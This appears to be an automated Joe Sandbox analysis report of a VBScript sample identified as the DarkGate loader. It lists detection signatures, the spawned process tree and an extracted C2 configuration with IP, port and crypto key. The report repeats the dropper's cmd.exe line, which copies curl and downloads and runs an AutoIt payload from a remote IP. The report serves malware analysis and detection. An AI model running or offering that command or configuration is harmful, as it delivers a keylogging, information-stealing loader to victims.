Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1.vbs

Overview

General Information

Sample Name:1.vbs
Analysis ID:1313188
MD5:317f213abccd88f7b240063e2bf9995d
SHA1:66e0867a6f86fe25cf6773e58a8ff9ebb34fa36e
SHA256:82e5409032e3d8d85390982fe99a86aa9f313f3c7b68c1e3fb4541d81fe9e24a
Tags:darkgatevbs
Infos:

Detection

DarkGate
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected DarkGate
Sigma detected: DarkGate
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Potential malicious VBS script found (suspicious strings)
Uses known network protocols on non-standard ports
C2 URLs / IPs found in malware configuration
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found decision node followed by non-executed suspicious APIs
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains functionality for execution timing, often used to detect debuggers
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Yara detected Keylogger Generic
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • wscript.exe (PID: 5528 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 6764 cmdline: "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • bpzs.exe (PID: 6948 cmdline: bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      • bpzs.exe (PID: 6852 cmdline: bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      • Autoit3.exe (PID: 6116 cmdline: Autoit3.exe szkzjr.au3 MD5: C56B5F0201A3B3DE53E561FE76912BFD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
DarkGateFirst documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darkgate
{"C2 url": ["http://94.228.169.143"], "c2_port": 2351, "startup_persistence": true, "rootkit": true, "anti_vm": false, "check_disk": false, "min_disk": 100, "anti_analysis": true, "check_ram": false, "min_ram": 4096, "check_xeon": false, "internal_mutex": "txtMut", "crypter_rawstub": false, "crypter_dll": false, "crypter_au3": true, "flag_14": 4, "crypto_key": "IDmfxvToPtabWZ", "c2_ping_interval": 4, "anti_debug": true, "flag_18": true, "flag_19": true, "flag_22": 8080, "flag_23": "AA11", "flag_24": false, "flag_25": 60, "flag_26": true, "flag_27": false, "flag_28": false, "flag_29": true}
SourceRuleDescriptionAuthorStrings
00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DarkGate_1Yara detected DarkGateJoe Security
    00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DarkGate_1Yara detected DarkGateJoe Security
      00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DarkGate_1Yara detected DarkGateJoe Security
        Process Memory Space: Autoit3.exe PID: 6116JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          Process Memory Space: Autoit3.exe PID: 6116JoeSecurity_DarkGate_1Yara detected DarkGateJoe Security

            Stealing of Sensitive Information

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3, CommandLine: "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3, ProcessId: 6764, ProcessName: cmd.exe
            Timestamp:94.228.169.143192.168.2.32351497132048098 09/23/23-08:02:03.355684
            SID:2048098
            Source Port:2351
            Destination Port:49713
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: DarkGate {"C2 url": ["http://94.228.169.143"], "c2_port": 2351, "startup_persistence": true, "rootkit": true, "anti_vm": false, "check_disk": false, "min_disk": 100, "anti_analysis": true, "check_ram": false, "min_ram": 4096, "check_xeon": false, "internal_mutex": "txtMut", "crypter_rawstub": false, "crypter_dll": false, "crypter_au3": true, "flag_14": 4, "crypto_key": "IDmfxvToPtabWZ", "c2_ping_interval": 4, "anti_debug": true, "flag_18": true, "flag_19": true, "flag_22": 8080, "flag_23": "AA11", "flag_24": false, "flag_25": 60, "flag_26": true, "flag_27": false, "flag_28": false, "flag_29": true}
            Source: 1.vbsVirustotal: Detection: 11%Perma Link
            Source: http://94.228.169.143:2351/msibpzszuqiVirustotal: Detection: 6%Perma Link
            Source: http://94.228.169.143:2351/bpzszuqiVirustotal: Detection: 6%Perma Link
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D3FD00 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,4_2_00007FF7F8D3FD00
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D3FCF0 CryptHashData,4_2_00007FF7F8D3FCF0
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D3FCA0 CryptAcquireContextA,CryptCreateHash,4_2_00007FF7F8D3FCA0
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D2486C CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,4_2_00007FF7F8D2486C